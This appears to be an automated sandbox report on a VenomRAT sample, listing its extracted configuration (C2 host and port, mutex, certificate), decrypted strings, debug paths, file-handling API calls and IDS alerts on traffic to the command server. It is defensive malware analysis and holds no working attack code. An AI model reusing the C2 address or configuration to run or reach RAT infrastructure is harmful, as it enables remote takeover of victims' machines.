                  Source: 30.2.RegAsm.exe.1300000.1.unpackMalware Configuration Extractor: VenomRAT {"Host": ["45.95.18.173"], "Port": ["4449"], "Version": "RAT + hVNC 6.0.6", "Install": "false", "Mutex": "vrecmkjrenno", "Certificate": "MIICLjCCAZegAwIBAgIVAJG/HBU0MsE8hj+URfFohwhsyC2LMA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDA1MTgyMTAzNTJaFw0zNTAyMjUyMTAzNTJaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDFfCE5H2StBn0fyU8L2ZZwJySL2LPG4qOPI/mp82dTmQeWziNGTMPoispy8p90WLtoBYuBD/kVBcU8i+yuF6901YHJ0ElKMrnuZyG/ajtEWPKEtHY2bLVMp/qKQ88ZKuvyKoo6PUqDbA/FmAfrXpUo/r/zIsbbKeW+3ITr86/n0QIDAQABozIwMDAdBgNVHQ4EFgQU7dxnglnWaiPzJgkcsN7JYR0itYkwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQCqr91VS33G3gI+NH2LwgXkC91jhVe4BOGpmHS+qXSgRoV0BQWI0lCohLkNqIvr15aKjJngDHKNVjWuCu/b8qKPTLwMUSanf5Do5+OD4N56vmTIZmqcpNDxQ6xZMeKF9+gC/W3U6+Ctn0m4P3Cp1gyVsJFwcCMUdGv7nK+YfvA9PA==", "Server Signature": "oYOqTjVKHp4zYZNcsu6b7PnQbByn94iLY8DZEegmV/zAco8OHoGu0fjzQ41fbgwdTZVeYTto/rUTBR7ZmhIslbI9cROHYMfI8Jg8SOCsGZKMvNM5Yxe4VuIO4ByTkiGRBYRNRdnQoF4two/3vM15gcnDLOWnsjvFYEMdFfPFLrg="}
                  Multi AV Scanner detection for submitted file
                  Source: ADFoyxP.exeVirustotal: Detection: 27%Perma Link
                  Source: ADFoyxP.exeReversingLabs: Detection: 13%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
                  Sample uses string decryption to hide its real strings
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: 4449
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: 45.95.18.173
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: RAT + hVNC 6.0.6
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: false
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: vrecmkjrenno
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: MIICLjCCAZegAwIBAgIVAJG/HBU0MsE8hj+URfFohwhsyC2LMA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDA1MTgyMTAzNTJaFw0zNTAyMjUyMTAzNTJaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDFfCE5H2StBn0fyU8L2ZZwJySL2LPG4qOPI/mp82dTmQeWziNGTMPoispy8p90WLtoBYuBD/kVBcU8i+yuF6901YHJ0ElKMrnuZyG/ajtEWPKEtHY2bLVMp/qKQ88ZKuvyKoo6PUqDbA/FmAfrXpUo/r/zIsbbKeW+3ITr86/n0QIDAQABozIwMDAdBgNVHQ4EFgQU7dxnglnWaiPzJgkcsN7JYR0itYkwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQCqr91VS33G3gI+NH2LwgXkC91jhVe4BOGpmHS+qXSgRoV0BQWI0lCohLkNqIvr15aKjJngDHKNVjWuCu/b8qKPTLwMUSanf5Do5+OD4N56vmTIZmqcpNDxQ6xZMeKF9+gC/W3U6+Ctn0m4P3Cp1gyVsJFwcCMUdGv7nK+YfvA9PA==
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: oYOqTjVKHp4zYZNcsu6b7PnQbByn94iLY8DZEegmV/zAco8OHoGu0fjzQ41fbgwdTZVeYTto/rUTBR7ZmhIslbI9cROHYMfI8Jg8SOCsGZKMvNM5Yxe4VuIO4ByTkiGRBYRNRdnQoF4two/3vM15gcnDLOWnsjvFYEMdFfPFLrg=
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: null
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: false
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: false
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: install
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: false
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: true
                  Source: ADFoyxP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62055 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62056 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62057 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62184 version: TLS 1.2
                  Source: ADFoyxP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: _C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2: source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: a\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1 source: curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: curcuma.exe, 00000024.00000003.2136454480.000002428F022000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000001E.00000000.1653142985.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: rnlmp.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191568059.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192182151.000002428F010000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: curcuma.exe, 00000024.00000002.2527246365.0000024290062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530022848.0000024290662000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2536660358.0000024291C6B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2527784177.0000024290261000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522353065.000002428F26C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2523595193.000002428F666000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532167366.0000024290C69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2531363274.0000024290A69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2539552200.000002429266A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535169251.0000024291663000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530698002.000002429086D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535663229.0000024291861000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2533565678.0000024291069000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2540211351.0000024292860000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2524330039.000002428F86F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522991819.000002428F460000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532744179.0000024290E63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2537654371.0000024292064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534825398.0000024291461000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2526786825.000002428FE63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534240303.000002429126B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2wek source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: r\AppData\Local\Temp\Symbols\ntkrnlmp.pdbR7 source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inic source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB90 source: curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ]\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2^ source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mp.pdb source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2457464322.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455703181.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: a\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1n source: curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2I" source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: "winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428EFDE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58315"G source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58313 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: jC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<,[ source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: curcuma.exe, 00000024.00000002.2527246365.0000024290062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530022848.0000024290662000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2536660358.0000024291C6B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2527784177.0000024290261000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522353065.000002428F26C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2523595193.000002428F666000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532167366.0000024290C69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2531363274.0000024290A69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2539552200.000002429266A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535169251.0000024291663000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530698002.000002429086D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535663229.0000024291861000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2533565678.0000024291069000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2540211351.0000024292860000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2524330039.000002428F86F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522991819.000002428F460000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532744179.0000024290E63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2537654371.0000024292064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534825398.0000024291461000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2526786825.000002428FE63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534240303.000002429126B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: pnaclmp.pdb source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Y\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831hO+ source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2#"I source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001E.00000000.1653142985.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: Temp\Symbols\ntkrnlmp.pdbD source: curcuma.exe, 00000024.00000003.2455703181.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdba source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbs source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: xC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_003DA087
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_003DA1E2
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,27_2_003CE472
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,27_2_003DA570
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0039C622 FindFirstFileExW,27_2_0039C622
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D66DC FindFirstFileW,FindNextFileW,FindClose,27_2_003D66DC
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D7333 FindFirstFileW,FindClose,27_2_003D7333
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,27_2_003D73D4
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_003CD921
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_003CDC54
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353090\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353090Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: chrome.exeMemory has grown: Private usage: 1MB later: 94MB

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.95.18.173:4449 -> 192.168.2.6:49690
                  Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.95.18.173:4449 -> 192.168.2.6:62054
                  Source: global trafficTCP traffic: 192.168.2.6:49690 -> 45.95.18.173:4449
                  Source: global trafficTCP traffic: 192.168.2.6:62052 -> 1.1.1.1:53
                  Source: Joe Sandbox ViewIP Address: 2.22.242.105 2.22.242.105
                  Source: Joe Sandbox ViewIP Address: 52.182.143.211 52.182.143.211
                  Source: Joe Sandbox ViewIP Address: 23.219.82.75 23.219.82.75
                  Source: Joe Sandbox ViewASN Name: SHOCK-1US SHOCK-1US
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:62057 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:62055 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:62056 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:62184 -> 104.21.32.1:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
